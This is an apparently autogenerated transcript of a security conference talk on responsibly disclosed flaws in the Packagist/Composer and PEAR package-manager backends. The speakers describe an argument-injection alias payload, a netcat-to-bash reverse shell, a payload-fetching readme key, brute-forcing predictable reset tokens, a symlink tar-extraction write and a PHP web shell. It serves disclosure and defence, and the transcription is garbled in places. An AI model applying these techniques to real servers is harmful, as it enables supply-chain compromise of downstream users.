Transcript
This transcript was autogenerated. To make changes, submit a PR.
Hello, thank you for attending Devsecops 2023. It's a real pleasure to
be here. And today we have a talk called oops, there is somebody in
my package manager hands, somebody is us. And we'll show you
how to get into package managers. And if you're not familiar with
the notion of package manager titled simply estimated that
92% of all commercial software are using open source composer.
So you need a way to manage these components, you need a way to install
them, to update them, even to list them so you are not missing
any of them. And this is something that we call package
managers. And usually we have specific package managers
depending on the current ecosystem. So for PHP developers
are going to have PHP package managers for Rust,
they will have a different one for all the rust packages.
And today we're only going to focus on package managers for
developers. So if you know a bit about
systems, you will know that, I don't know on Ubuntu you may
use DPKG or Apt to pull system packages,
but this is not what we're going to look at today because it works slightly
differently for software packages. It's most of the time things like front
end libraries, back end
APIs to interface with payment providers, any kind of
things and features that you may need. And if you're a developer,
you have probably already seen one of these logos. There is
Python with Peep, there is Ruby with Ruby jams.
There is PHP with pair and composer. On the JavaScript road,
there is boa for Frontend and Yarn, and NPM. There is
even one for latex called Mctech. So plenty of package managers
for every one of these small ecosystems.
And there is another notion that needs to be, to be known,
which is something that we call supply chain. And it regroups all the
processes, tools, software, which are part of the life of product.
It's not only for software, it could be anything like if
you have a physical product, shipping would be part of its supply chain.
And as a result, software dependencies. It's only a small
link, because if you push things really
deeply, like even your laptop on which you're developing your software
is part of its supply chain. So it's basically anything that searches your
software that's part of its supply chain. Pretty famous KCD
drawing on supply chain is this one. So it
displays something that's called all modern digital infrastructure,
made of small blocks put all together on top of each other.
And one of the blocks that's really crucial for this modern
infrastructure to work is a small blog that's called and it's written
the project. Some random person in Nebraska has been Franklin maintaining
since 20 or three. And in our case, this small project
is going to be the back end servers behind package managers.
And this backend servers is necessary because when you install a
package, you install it by name hands. You need to have a way to tie
this package name, this identifier, for instance, auto package
to its location. So it could be HTTPs to some random server.
It could be a GitHub repository that you need to clone, could be anything
that the package manager supports. So if you
composer the backend server that makes this association, you're going
to be able to change this association between the name and destination, and attackers
are going to be able to force you to download completely unintended
archives and tofu dependencies. And it's likely to lead
in the execution of arbitrary code, as you will run the code of this
dependency at some point in time. So let's do it for a quick presentation,
I'm going to be helped by Paul today. Paul is going to make the second
half of the talk, and my name is Thomas and we're both primitive researchers in
the sonar research and development team. We helped drive innovation by
finding zero days in popular open source software. And if you don't know
Sona, our mission is to enable developers
to write clean code that means that are free of functional bugs
and security vulnerabilities. And you probably know one of our products.
We have Somacube doing this analysis on premise. We have Somacloud
doing it in the cloud and Sonarlint doing it in your code editor.
And for today we're going to show you the result of a research on
security of packet managers and the backend servers for the
PHP ecosystem. Because that's the one for which we have the most interesting
results. And we're going to start by taking over packages,
which is the main repository behind composer,
the most popular package manager for PHP.
And we did it twice. So we're going to show you how we did it.
We're then going to present how we did it for pair, and we're
going to try to give a few insight on how to try to reduce
the impact of these attacks and try to prevent them in the future.
So let's start by looking at composer and packages.
Composer is the most popular PHP package manager.
It's used by virtually any company running PHP somewhere.
Like if you have a PHP application somewhere, you're probably
using composer to fetch, install and update all its required
dependencies. And it's using a central registry.
So like we say, doing the name and the location of the
packages hands its registry. It's called packages.
Both projects, composer and packages, they are all open source and written in PHP,
and they maintain and also public instance is maintained by a
company called private packages, which is providing private hosting
for packages.
And to try to give a very rough estimate
of composer architecture. So this is very unscientific, don't do
it at home. But it's just to give an idea of how popular this
is. It's kind of
known that PHP is behind 78% of the Internet, which is still
a got, even if its popularity kind of decreased for some time.
It's not really back hands. WordPress alone is
43% of that, and composer is not required
to run it. So we have to remove this 43% of
these 78%. And so we also did an estimation
of how many PHP projects would use composer,
and we found something like 70%. So we can say that there
is a total of maybe 20% of world servers
running composer in a well, another hands. This small graph
comes from the official packages statistics, and we can see that
there are monthly 2 billion packages which are downloaded from packages.
So it's still pretty heavy use of these package
managers. Even if everybody tried to tell you that PHP is dead, that's really not
the case. And in the past
years, we achieved to compromise packages twice. So this
server, this back end server, we did twice. First time
in April 2021 hands, second time in April 2022, a year
later. And these two cpes, these are two very
similar vulnerabilities in composer that we found. So we
discovered and reported responsibly reported this vulnerability to
the maintainers of composer and packages. So let's dive into it.
First thing, when you get the packages interface,
you're going to see this small page to submit a new package.
And it's really simple. There is only one field where you put the URL
of your package, and then you run check. It's going to check if this is
indeed packages or composer package with
the right format, the right manifest file, and then it's going to try to import
it into package registry afterward.
Any developer is going to be able to import this package and use
it as any other. And to
do this import, like to clone this folder, packages is
going to RNS composer formless operation. It's going to check if
the project contains a file called composer JSON, which is manifest,
and it's also going to clone this repository,
pass the manifest, create it into the database, and add the right
metadata files. So next time somebody runs composer,
they will be able to find this package and download the right source.
And when we say that the remote repository is cloned,
it's done with the logic that's already implemented in composer,
say use composer as a library to not have to
implement it again. And for every single supported
version control implementation, it could be Maclio, that could be got, it could
be subversion. It will check if it's an honor host because if the oil points
to GitHub, it's always going to use git because they know it's
ported. But for the other one they may have similar
tricks. And is it matching the expected format?
Like is there something that's missing? Is it missing
to got at the end? Is it already present?
So there is some small logic checks in there
and then it's doing some further verification on the remote end.
And to not implement everything in PHP because it needs
you to understand all this protocol work. And it would be like it's
already done, like binaries that
we are all using, they already would do it for us.
Simply run git remote hands hands, the URL
that you just provided. Same with the version they run svN info
with the URL you just provided, and same with
Ha, which is a mercurial client.
And if you look at these lines of code, there is something called process
executor escape. So it's an escape function.
And the role of this escape function is to prevent command injection
vulnerabilities. If you're not familiar with command injection vulnerabilities,
I'm going to quickly explain it to you and it's going to be really useful
for what's coming next. So in that case, if in the controlled
variable it's pseudocult, don't worry about the syntax.
We put this weird sequence which is dollar and parentheses and
dates. And in shell script, this sequence of dollar and
parentheses is going to execute what's within the parentheses, in that
case date, and put as a result as a string in
the current script. So in the case, if you execute,
it's going to take AJ hands PhP and our sequence.
So it's going to see this comment abstraction sequence and it's
going to execute it first, and then the
resulting string will be used in the final command and it's going
to run AJ identify. Tuesday, August 2 August 2
it's pretty unsafe because date could have been anything else,
it could have been rf star to
remove everything from the file system. So to prevent that
kind of comment injection, you need to use
escape functions. And this escape function will surround data
with single quotes. So the shell will see it
as a string, literal and not as something it should try to
evaluate in that case. Okay, gentify hands
between single quotes. Our injection and it's going to just
run AJ identify hands a string
and the date command wouldn't be executed. But what happens
if I try to put something like an
option like can I maybe inject arguments? That case,
the shell is going to run AJ identify and help
in that case. And yes, it's going to pass the argument ALP
to identify. And if you trace on the shell,
the single quotes don't matter because the shell will remove the single
quotes and do the call correctly with three arguments,
AJ identify and help.
And something interesting in that case, displaying the help is
not so helpful as an attacker. But if you start looking
through the material manual, you will see that it's possible to
create aliases with the same name as the existing commands,
which can override original definition. So that means that there is a way by
passing an extra argument like something, it's already
something we can do. In that case, we can change
behavior of existing commands. So that's already pretty nice.
And they also say that null, yes, can start with an exclamation point
to make it a shell alias. So this thing would
allow us to execute shell commands instead of the identify.
So with a payload like config equals alias
identify and exclamation point, we can put basically
any shell command. So if we try to import
a new URL whose format is
config equals alias identify, it's going to execute arbitrary
commands on the packages instance.
And as a result we would be able to change
any software dependencies that's hosted on the server.
So that's something we reported and it was fixed with now in April 2021.
So let's look at it. So let's start by showing you how
we set up this test instance. So this terminal is
root on a virtual machine at this IP address that we can ping
from Alice, which is the attacker. So when we
got on packages lo like local all this IP address, we reach
the test instance, not the real one. So now Alice can go to this
interface register as attacker like
you could do as any other developer. And now you can go
on the submit section and put the payload
we just show you. So this config equals alias
identify and then a shell command. And in that
case, the shell command is going to be Netcat, and we're going to pipe
all of Netcat's input output to bash
which is going to grant Alice a remote shell
on this host. So we can use socket to listen
for the connection. Get back to us, we run check
and now if we type comments like id, we're going to see that we
run with the WW data identity. So this is
not very interactive. So now Alice can use Python to get an
interactive shell in this prompt. This is
what's happening. And now as we see we have a will shell.
And now let's authenticate. As Thomas so this is me, I'm a developer.
I'm hosting an awesome package called stunning
waffle on packages on this test instance.
And as we can see there is only one version of this
package, one release on dev main.
So if I want to use it as a developer, I would type composer
require and name of my username and then the name of this
package and then it just works hands. Now I can use it.
So it simply is playing some emojis with waffles,
sparkles and a cook. And that's great.
It's what I intended to have and that's why
my package exists. But now at the same time Alice
with this interactive shell that just add
can go and try to modify the association
between my name so the name of my package standing waffle
with the source. In that case the source is a got
repo. So if we change this JSON file,
hands try to point to somewhere else. The next time somebody will
use composer update or composer require. This is
the arbitrary destination that will be fetched from.
So in that case Alice can simply take
a JSON file was modified beforehand,
hands replace the one on the server by the one that
was crafted. So now it's being replaced. And next time somebody
types composer updates, we see that there is an update.
And as a developer I did not push this update. So something
happened differently. And if I run my main
PhP file again, maybe something else will happen.
Now let's look at how they chose to fix it.
The only official way to fix such vulnerabilities
is to use a dash dash sequence. And it may look a bit weird,
but in the end it's part of the project specification and
for any project's compliant argument passer, when you
first encounter this, you have to ignore
all the arguments that come next. They should be treated as appearance and not
as arguments. So if you create a file called
help and you try to ls help, it's not going to work because
help is going to be treated as an argument. But if you then run ls
space help, it's going to work because
of support of this special argument.
And the timeline is really cool. In that case, like when you
report security vulnerabilities, you really wanted to get it fixed.
And most of the time when it's so critical, you can't wait,
you're just syncing your mails several times a day just
to make sure you did not miss response.
And in that case, we notified security@packages.org at
01:00 a.m. And at 10:00 a.m. They released the odd fix on
the public instance. That means that nobody could exploit it anymore for will
if somebody already knows the vulnerability. And a few days after
they released a patch version, like an official patch for composer
and so also for packages, and they released
the same day an official announcement and one year
left later we're like okay, did we miss something?
Is there anything left on packages? So let's
try to identify a new vulnerability in packages just for fun.
And a good thing is we are already familiar with this code base. Like we
already paid the initial cost of entry of approaching
a new target. We already contributed to the patch. We looked for bypasses,
which mean that we come with the same set of assumptions and biases,
but maybe there is still something. So what
did we miss? The first thing, like we already
know that vcs driver,
there are wrappers around all dictionary command that's being run. So the git
command, Sebastian command, Mercury Command,
and this is where the first vulnerability happened,
because they have to invoke third party external commands.
And that's really risky either because you can introduce
command injection or argument injections. So it's
still target of choice for simul bugs. And is there any invocation
without dash dash left that we knew that maybe that could be available to argument
injections. And when we're using this code we noticed a
few calls without this dash dash. So at risk of argument injection,
and one of them looks really familiar because we
tried to send a patch to correct these lines,
but in fact it was removed from a suggestions like they
explicitly removed these two dashes for the got
and for the mercurial invocation and they said yeah, remove fix
because it was breaking a feature and the culprit is in a
function called get file content. So this get file content will allow for
any wrapper around git mercurial version.
It will allow to read a file content from the repo. So when
you clone the repository, you don't need to have the work preview, you can
clone a bare repository and then call this get file content
that will call the right version control
subcommand to get the file's content.
And so you also can also get the file content
at different revisions. So it could be on the main branch, or it could be
some old historical branch, or it could be a doc branch.
And when you run git show with the end of
option, so with the two dashes it breaks,
because in this comment it has special meaning that's different from the
one of the spotic specification, and its goal is to separate
revision from pass. And if we run git show,
add colon composer Json, we get the content
of composer JSOn. But if we put this, which should
work per the project specification, there is nothing,
it's just not working as intended. So that's why they removed
this dash dash. And the thing is, the argument
for call to this get file content.
Like when the readme is being updated for display on the
packages interface, the arguments come from composer JSON,
so it comes from the manifest. The manifest can have a key called reADME
to give a different reaDME than reaDME txt or ReaDME
MD could be don't readMe md. It also works as long
it's part of the manifest in the readme key and
in the mercurial driver this
value goes straight away. So it's escaped. So it's safe against
command injections, but it's not safe against argument injections.
So we have the exact same scenario as in the first
vulnerability. We can add extra arguments to it. So the macro
invocation. So to exploit it, we would need to create a project in
a remote macro repository. We would need to set a malicious readme
key in composer JSon. Then we would need to import package
on packages, and we could use this vulnerability to maybe
write an arbitrary file laboratory Php script to via
WW packages. So under the web root and
we can maybe try to use it to execute arbitrary PHp code,
resulting in the same exploitation and the same impact
as the first vulnerability researcher we presented earlier. So in
the composer JSoN, the readme key would contain something like
the usual config equal alias. This is a cat
command. So we override cat and not identify.
We put this exclamation point to say it's a shell command. And then
we use since this other repository is icondas
bear, we cannot just read payload sh from the local file system.
So we use AJ mercurial client
to read the content of a file called payload sh. We pipe it
to the shell to execute it. And then there is a mandatory fix to
reach the right code pass on packages so it executes
our update when we call. So txt.
In that case, let's see what it looked like. The setup is roughly
the same, but this time we're going to need to host our repository somewhere.
So I choose a source art because this is one of the only
few mercurial hosting services that's left for free
on the Internet. And on the right I have two windows.
These are root shells on the packages test instance,
and I'm trying to show and to see if the file
main php in the web root and Tmp pond were
created or not. And for now they still don't exist. So we're going
to take the URL, the public URL of this repo and
import it in packages. And in this repo we put
composer JSon with a readme. That should remind you something, because this
is a payload we just presented, and this is going to run payload
sh, which is writing the output command Id in
Tmp pond and the file main php under
the web root. And in main Php is simply a
Php script that will execute any command that we put into CMD
parameter. So now let's start to
log in and let's try to import it. So we have
a user account, and now we simply put
the public URL of our mercurial repository. We submit it
and the import will happen. As for any other repository,
nothing will go wrong for now. But as
soon as we click update, we will reach the cut pass that was discussed
earlier. And when the job succeeds,
workers are starting to process all the imports. And as we see on
the right, we have the output of the command Id in TMP
pond, and we now have something in main Php under
the web root. And if we try to go directly on this file
and try to execute arbitrary commands like LS, we see
that we have the output, and obviously with Id we get the
same. And now we could do as interface demonstration,
which is backdoor packages by modifying the JSON files
of the semitad data. So now we can look at
the timeline of this bug. So we first reported it on
April 7 at 06:00 p.m. Which is a much better
work hour. Then we got an acknowledgment
like 1 hour after. So it's like pretty quick. We knew that we would
be working on Oddfix right away. They could deploy Oddfix
on the official packages instance the day after.
So it's also like the most important part, like at least nobody
could exploit it on the instant that's used by basically everybody.
And a few days after they assigned cv did an
official announcement to say that they did not identify any trace
of exploitation on the brick instance except us.
And they also released new composer versions
to protect everybody that were trying to
use this feature from composer and the patch.
It was not really easy to elegantly fix it because there
is this dash option that we need to inject so
they couldn't put before it, otherwise it would break this
dash option. So they simply prevented any
branch name whose name start with a dash. It's not
perfect, but I mean, at least it's pretty effective. So now
Paul is going to guide you through similar vulnerabilities in another software
package, managers for PHP called pair. Okay then,
let's look at pair now. First of all,
what is pair? Pair stands for PHP
extension hands application repository, and it is the
historical package manager of the PHP ecosystem.
It was created in 1999, so quite old now,
and today it's only moderately active anymore.
Since its beginning it served almost 300 million package
downloads, and nowadays there are roughly 50 popular
packages. They are still being actively
developed and published on pair, and among them
are names like pair, console, getopt. Net,
SMTP, and archive tar.
First of all, before we look into the vulnerabilities of pair,
or before we start to search for them, we have
to think about the attack surface. And one big difference
between packages and pair is that for pair,
administrators have to manually validate all new accounts.
So how do we really get an account?
Well, we don't. We could try to trick an admin into accepting
us, but we want to focus on the technical side and not trick people
into something. So we have to start with the pre
authenticated text service. This includes all the features
that you can use before you even log in, and there are some
features of that in pair. A historical
package manager also probably means that it was built with
historical best practices in mind that are nowadays considered
deprecated, and it also has to support older
PHP versions. So with this
attack surface in mind, we started and we did
this. We do what we always do when we start a new research project.
We use our own tool, sonar cube,
to scan the code of the target. Sonar cube is a
static analysis tool, so it will look through the code and
find dangerous places, for example, where user input lands in
a dangerous function, or where certain functions are used
in a bad way, or in general functions that are considered
dangerous. And in this case, it gave
us an issue about pseudorandum number generators,
and that there's an unsafe one being used here you
can see it down below. The function is empty rand and
it is in the reset password function.
And this is very interesting already, because this is
exactly one of those features that can be used before you log in.
If you lose your password, if you forget it,
then you might want to reset it. And to do this you
can't log in. So this is already a pre authenticated attack service.
So we dug a little bit deeper into what
happens here. And what a reset password
function usually does is it generates a random
token, then emails it to the user so the user can
click on a reset link and then they can set
a new password. So this function also does this.
And the way it's done is like this. It takes four different values,
combines them and then hashes them with MD five,
and the result is the random token.
But some of the values are easily
predictable or known by the attacker.
So the first part is a random number. This is
the pseudorandom number generator function that
was raised here. And the
two arguments don't mean the length of the number, they are the interval.
So this function will only generate nine different values
between four and 13, which is not a lot and easily
guessable. The second part is the username of the account
that has the password that should be reset. So this is also
from the request attacker controlled.
The third part is the server's local time at
the moment of the request. And this might not be
so easily predictable, but the server always sends
back a date header in its HTTP response that contains
the local time. And the last thing is the
new password that you want to set. So for pair,
the password reset works like this.
During the reset you already give your new password and
once you get the link you basically accept that this is a new
password. So as I said,
the last three things are either directly controlled or
can be known by the attacker,
and only the first value is really the one that's
random. But as I said, it can only have values
between four and 13, so it's also very easily guessable.
And with that we can reset about any accounts password
on pair. So to sum
up where we stand right now, we chain take over
any account with about 50 tries. Sometimes we have to guess a little bit more.
If the timestamp is few seconds off, or maybe
the time zone, we don't know it and have to try it out. But 50
tries should be enough for any account. And it's also
very interesting because pair accounts are public.
For a specific package, you know which user
published it and you only need their user account and not their email to
reset the password. So what we could do is find
popular packages and target their developers
and then release a new version of that package that has maybe a backdoor
built in. What's also very interesting
about this bug is that it was 15 years old when it was
discovered. So the bug was actually
in the reset password function, since this function was
written the first time. So really a long time where
people could have abused it if they found it,
but we didn't want to stop there. Breaking over
every developer's account creates a lot of noise and
people could get suspicious and block
the attempt or clean up after the attacker
if they notice it. So is it possible to gain code execution
on the servers and replace all the packages in a more
stealthy way? This is what we wanted to find out.
So we went ahead and looked what we could do.
Now, now that we have new attack
surface, because now we have an account, hands can use more features than before.
We can see that packages that are submitted, new ones
or updates are added to a work queue where then
asynchronous workers will process them and eventually
publish them. And this processing works like this. At first
the package is extracted, hands validated,
and afterward the documentation is generated using
the PHP documenter tool. And finally the documentation
and the package download are copied to the package page where you can now see
the packages readme documentation and can download the package.
And this also sounds really interesting.
The extraction process and the documentation generation
process sounds quite complex. A lot of
file file system handling and also this tool,
a lot of complexity where things can go wrong.
So we looked into the code to see how all of this worked
at first. Here's the code that extracts the
file. So when you upload a package, you have to
do it in the tar archive file format,
and then this file is extracted with the archive tar
package into a temporary directory.
Then we had a look at the version that's being used of this archive
tar package, and we noticed that the version was slightly out of date.
They used version one four seven, and at that point
we looked up to see if there's a known vulnerability in
there. And in fact there was,
there was CVE 2023 6193
hands. We looked at the description to see what exactly this
vulnerability was about. The description
describes that it allows write operations with directory
traversal due to inadequate checking of symbolic links.
And it gets more and more interesting with this,
because for once we now know that directory
traversal has to be used and it has to do with symbolic links,
but also writing files somewhere
is very, very powerful in the PHP ecosystem,
because once you chain write a PHP file
to the web root of a server with controlled
content, you can basically just browse there and
the server will happily execute your code for you.
And then you can do about everything that the server could do.
So to find out exactly how this vulnerability has
to be abused, we checked the patch
of the vulnerability. This is a very commonly
known technique to just look for the patch and then see what was changed,
and then you know exactly what they now prevent,
what was previously possible. So in this case,
the patch added these few lines that
add another check. So whenever a file is extracted,
hands then contains an element that is a symbolic link.
Type two in terms of the tar format.
Then it will see if the symbolic link points inside
of the extraction directory or outside of it. And if it
points outside of it, then it will be blocked and an error
will be displayed instead, because this is
now forbidden. With this,
we knew that we somehow had to use a symbolic link
that points somewhere else. But symbolic links in themselves
are not really dangerous, it's only a pointer.
So somewhere else we still have to write there. And to
do that, we crafted our own tar archive file,
and it looks like this. The first element
in the archive is a symbolic link called Sim
link. It points to the web route and then to the
file evil Php in this web route.
The next item in the tar archive file is
a regular file. As you can see, it has 49
bytes of content, so there's some content in
it, but it is also called Simlink.
And then lastly we have package XML,
which is a file that's needed by pair to do some more validations on
the package. And if such a tar file is
now extracted with the archive tar package,
the following happens. What you can see here
is a rough approximation of the file system of the pair
server. At the top you have the web route called public HTML.
It contains for example an index PhP file
and other files that are reachable via the web.
Below that you have a temporary directory.
One of them is used for the actual uploads.
So the tar files and the bottom one is
used to extract the tar files there. In this
case, our package is called my package and
it gets extracted. So at first, the first element is
extracted. This is the symbolic link called Sim
link. It points to evil PhP in
the web route. But the file evil Php does
not exist yet, it's only the link that exists.
Next, the second item is extracted,
and this is the regular file that is also called Simlink.
This causes the system to write to the file called Simlink,
but because it is a symbolic link or was before,
it writes to where the symbolic link points and not directly
at the location where it is. So this causes
the file evil PhP in the web route to be created and the
content is arbitrary, the attacker can completely
choose it. In this case it's a simple Php script
that executes a command as a system command that
is given via a get parameter,
and then finally the package XML file is also extracted.
But for the exploit this is not really
important anymore.
So let's put the pieces together. We chain both of
the bugs to first take over an administrator's
account with the reset password functionality. Then we
used these new privileges to create a new package and
automatically approve it so that it would get added to the
work queue and extracted. And during this extraction the
known CvE exploit in archive tar leads
to the file write. And finally our own PHP
script lands in the web route and we can just execute it.
And with that we can compromise all the pair packages
with very little noise.
And yeah, basically that's it of the
journey on the back end side, because there's
no much more room for lateral movement
on the server that hosts pair. There's only other
stuff related to pair that's being hosted.
So we could for example compromise the pair installers.
But the real interesting thing for a real attacker would
now be to backdoor all the packages and then
wait until people install them and move into their
network hands, install malware there. So to show
it all, we now have a small demonstration about how to
get a shell on the pair of server. All right,
this is the third and last demonstration for today. So we
have the same setup. We have a test instance of peer on the left,
which is Austin on the vm with ip addresses on the screen
below. This is just test one. Again not real
production instance. And to make our life easier for the demonstration,
we're going to start a cron job every 5 seconds on the wheel instance.
It would I think take up to a day, but we don't want
to wait for a day for a demonstration, so it's going to be quicker that
way. So we know there is the admin account, but we
don't know its password. So we can use the exploit to
first fetch date of the server hands, try to
bridge force, the only few reset
tokens that may exist at that time. So we do a password
reset request and then we use this date
to try to guess there is a token and
change the password. And now we see it succeeded and we can log in
as admin and FuBaR. And this is super user. This is really cool.
We can already start releasing backdrop releases for everybody,
but we'll show you the second
exploits that we found. So we create the malicious archive
with two sim links. First sim link as a link, then sim link as a
file, and then finally the package XML. We upload it and
when it's done we see that the crown will trigger and
it will write the evil PhP file under the web root.
And if we access this file with the right parameter, we can
execute arbitrary commands like id or your name.
Okay, now let's have a quick look at the timeline of this
disclosure. We reported
this in summer last year to the pair
maintainers, and a few days after they pushed
commits to their GitHub that fixed this issue.
But then it unfortunately took some months until these
fixes were actually deployed to the pair instance.
And in this timeframe people could have seen that there is
a fix for a vulnerability and what it is and try
out if it has been fixed on the server yet.
Unfortunately, to our knowledge this did not happen. But it's
always best if the fix and also the deployment of the
fix are being done as fast as possible after
another. If you can,
you could consider moving to composer, because packages
are also present on composer when they are at pair,
at least for the very popular ones.
And composer and packages have far more active community
support and as we've seen, they are able to patch faster.
Now let's have a step back hands think about how we could prevent
these attacks in general.
First of all, we have to admit that our ecosystems
are not robust against these attacks. And this is not only a
PHP problem, it's basically in most ecosystems
that these central components are built by
volunteers and also maintained and operated
by volunteers. So there can be bugs in there and you can't
really blame anybody if they do it in a free time, right?
So in order to fix this, we want to focus
on two actionable ideas that could help prevent these attacks.
First, we could impact, do impact reduction
reduce the impact by doing mandatory
code signing of software artifacts. And secondly,
we can reduce the risk by applying all
the security best practices. For the first
part, the impact reduction,
we want to have code signing because in
fact package managers don't have to be trusted. In the end
they are just simple tubes, a tunnel that you reach through
to get what you want. And you don't want to
have to trust this, you only want to trust the
thing that you are getting. So if the thing you
are getting the artifact that you download is signed by the developer
that wrote it. Then you
only have to trust this developer's identity.
And you get the identity via OSDC providers or
via GPG keys, something like this. So that you can
check the cryptographic signature of
the thing you download. And if the signature is correct,
then you know that it comes really from this developer.
And then you only have to trust the developer and not the developer and the
package manager. So this would already avoid
many attacks on the package manager platforms.
The worst thing that could happen now is you can't
get a package because it's backdoor. But since you know that it's backdoor,
because the signature doesn't match, you can just discard it and not
use it. But all of this only works
if it's mandatory. Otherwise there will always be holes
in the system. For example, if package a is
signed, then you would notice if it's being manipulated.
But if package a depends on package b, and this package b
is not signed, then you can't really use package
a because you would have to download both of them in order to use the
whole thing. But since you can control or
check if package b is
really the thing that the developer wrote.
Yeah, the whole code signing thing doesn't work anymore, so it has
to be mandatory.
One project that wants to tackle this is Zixtor.
Zixtor is basically a public append only
ledger where signatures of all the artifacts of all the packages
are being published at. And to
sign the packages, only ephemeral keys are used
for exactly the signing and storage. And it's
kind of similar to TLS certificate transparency,
where there are already these kinds of append only
public ledgers where certificate
authorities are publishing all
of the tickets, not tickets, all of the certificates
that they are issuing. So you could watch there and
see if some CA is issuing a certificate
for your domain that they're not supposed to do,
and then you can intervene. And Sixto also
has protection against downgrade attacks, which is also very good
for the security of the whole system. And suddenly,
if you use Sixdore, and if Sixdore would be integrated into your
ecosystem of choice, you only have to trust the identity
providers and not the
ecosystem itself. And since the identity
providers are usually big companies such as GitHub or Google,
you know that they have much more money hands people to
make sure that their systems are safe and not breached,
and really only provide those identities
to the people that they should.
The second part is code security,
applying code best practices.
So most back end services of these package managers
are open source. There are some exceptions
to this rule. For example, NPM. There's only the client that's
open source, but not the backend.
And you might think, as with all open source software,
yeah, open source is nice, and that is true. But you also might think,
okay, yeah, it's open source. So surely some people
have already looked at the code and made sure it's safe.
But did really somebody do that?
You don't really know. So who's auditing all this open source software?
We do it, but we can't audit all of it.
Hands code reviews take time, and they require money
if you want to hire somebody to do it, and also paperwork and all
this organizational stuff.
So can some random open source project really come
to a company and say, please audit our code?
Also, there's bug bounty programs such as Internet bug
bounty, and this particular one is supposed to pay out bug
bounties to researchers that find vulnerabilities in
popular software that's used all over the Internet. But for
example, they didn't accept these bugs we presented today.
So who would do it if not them?
So there's maybe not that good of an incentive
for other researchers to do it. And speaking of other
researchers, we only know of less than ten people in
general that publish bugs in these targets in other
package managers. So that's really a small group of people who,
even if they wanted to, would have a hard time covering all
of the code that is part of these ecosystems.
And finally, we, as outsiders,
we don't have access to the infrastructure. We can only look at the code
in the form that it's published, for example, on GitHub, set it up ourselves
and see if there's a vulnerability in there. But we don't really know how
the production system is set up and can't see if there's a
misconfiguration or other issues that can only be found
if you look at the actual system.
Also, the security of clients is important.
Today we spoke about the back end services,
but there's also the client part. And one
problem is that they don't have a clear threat model.
Usually a developer uses the client, for example,
the composer command line util,
to download a package. But what assumptions can you
make? Like, should the folder in which the command is run,
does it have to be fully trusted and safe, or can it be
in any directory?
Can you trust project files or other integrations
that are present in this environment?
Nobody really set the threat model for this.
We did some previous work on this topic, for example,
git integrations in ides or in your favorite shell,
and also other package managers. And the answers
were really different. Some projects said, now we don't
see this as a security vulnerability.
If a user runs a
command inside an untrusted directory, it's their fault.
They have to make sure to only run this on trusted files.
And others took our report and fixed the vulnerability,
either because they said, okay, this is our threat model, or because
they said it's maybe not, but let's be sure and still
fix it. But yeah, the gist is that it's not
really defined and people don't really agree on what the threat model should
be for clients.
And in general, clients are more likely to receive contributions
than servers. Clients are what the people use
day to day. So they might want to have more features in
there to make their life easier. And running
a repository, servers,
yeah, way less people do that.
So yeah. Let's conclude today's talk and
come back first to the question that we asked in
the beginning. Could we composer a good chunk of the Internet?
Yes, we could. And it's really scary
because the attacker level, I mean we are
seasoned security experts, but there are a lot like us out there
and even some that are not acting in good faith. So there
are really some people who could have found this from a skill point of view
and could have abused it.
Looking at the time that it took to find the bugs, it was less
than a week. So yeah, again, if somebody with the
same skill level wants to find these bugs, they can.
They just have to sit somewhere, look at code for
some days and probably would have found it.
And when we look at the money, it was not even
relevant in this case. We didn't need big servers to
do this attack or something like this, just download the code and
read it. Really,
this leads us to the usual suspects of open
source software security. I already said there's
this thing where people think, oh, it's open source, surely somebody has looked at
it, but did somebody really do it?
And there's always lack of maintainers and lack of security reviews.
If you want a feature in an open source project, you can ask for
it, but the maintainer doesn't owe you something,
you don't pay them to include it,
so it might not get added. And the same is
true for security fixes and stuff like this.
Most maintainers want to fix them, but maybe sometimes they don't have
the time, they don't have the right know how. It's a difficult situation.
So yeah, devsecops teams really have
to apply all the supply chain best practices that they can,
so they can make sure their environment is as strong
as possible so that some vulnerability occur
in some of the other parts. They don't have that
much impact. But on the good side,
we see initiatives like Sixdor that really look
promising and are already being integrated into some ecosystems.
And if this trend continues,
at some point we won't have to trust the middlemen, the package managers
anymore, and the whole ecosystem will be one
step safer. And of course,
if you can audit your package managers, if you have a
security background, if you know a little bit about code and security,
why not look into your package manager, into the package manager
that you use all the time. Try to see if there's a
vulnerability in there. And if you find something, please report
it responsibly so that it can be fixed and
everybody will be happier afterwards.
Now we have to give big kudos to all the managers
that helped us with these vulnerabilities. So for
packages, that's Niels, Jordy and Stefan,
who are really fast to fix and really
pleasant to work with. For pear, it's Chuck, Ken and
Mark who also helped us get this
vulnerability fixed and then finally deployed.
And yeah, I assume working on such a legacy code base
is not that easy. So thanks to them.
And if you want to support them, then you
can do it via these links, via GitHub or OpenCollective.
And if you are using any of their projects, especially in
a commercial sense, then I would really appreciate
if you would fund them. All parties would
benefit from it because the software that you are using
can get better and more secure if there's more funding to
maintain them and maybe do an audit on them.
If you need more or want more technical details,
you can find them in our several blog posts on blog sonarsource.com
or you can talk to us, message us. We will
be happy to answer questions. And if you
loved what you saw today, you can also join us
in the journey of making the open source world more secure. We work
on a lot of interesting targets.
That's it from us. Thanks for listening to our talk.
We hope you enjoyed it.